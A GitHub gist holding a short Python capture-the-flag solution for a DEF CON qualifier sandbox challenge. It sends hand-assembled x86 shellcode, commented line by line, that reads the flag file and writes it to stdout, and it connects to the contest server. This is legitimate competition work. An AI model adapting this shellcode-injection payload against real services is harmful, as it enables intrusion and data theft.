Last active
February 1, 2018 06:23
-
-
Save jgor/15029aa1efa960e5c805 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import socket | |
# b8 03 00 00 00 mov $0x3,%eax # syscall 3 (read) | |
# bb 03 00 00 00 mov $0x3,%ebx # from fd 3 (flag file) | |
# 89 e1 mov %esp,%ecx # to stack | |
# ba 30 00 00 00 mov $0x30,%edx # 0x30 bytes | |
# cd 80 int $0x80 # perform syscall | |
# b8 02 00 00 00 mov $0x2,%eax # syscall 2 (write) | |
# bb 01 00 00 00 mov $0x1,%ebx # to fd 1 (stdout) | |
# 89 e1 mov %esp,%ecx # from stack | |
# ba 30 00 00 00 mov $0x30,%edx # 0x30 bytes | |
# cd 80 int $0x80 # perform syscall | |
# b8 01 00 00 00 mov $0x1,%eax # syscall 1 (exit) | |
# bb 00 00 00 00 mov $0x0,%ebx # return code 0 | |
# cd 80 int $0x80 # perform syscall | |
shellcode = "0x80cd0000 0x0000bb00 0x000001b8 0x80cd80cd " \ | |
+ "0x00000030 0xbae18900 0x000001bb 0x00000002 " \ | |
+ "0xb880cd00 0x000030ba 0xe1890000 0x0003bb00 " \ | |
+ "0x000003b8 " | |
payload = "0x0 "*278 + shellcode + "0x0 "*3 + "\n" | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect(( | |
'cybergrandsandbox_e722a7ec2ad46b9fb8472db37cb95713.quals.shallweplayaga.me', | |
4347 | |
)) | |
s.recv(256) | |
s.send(payload) | |
output = s.recv(256) | |
print output |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment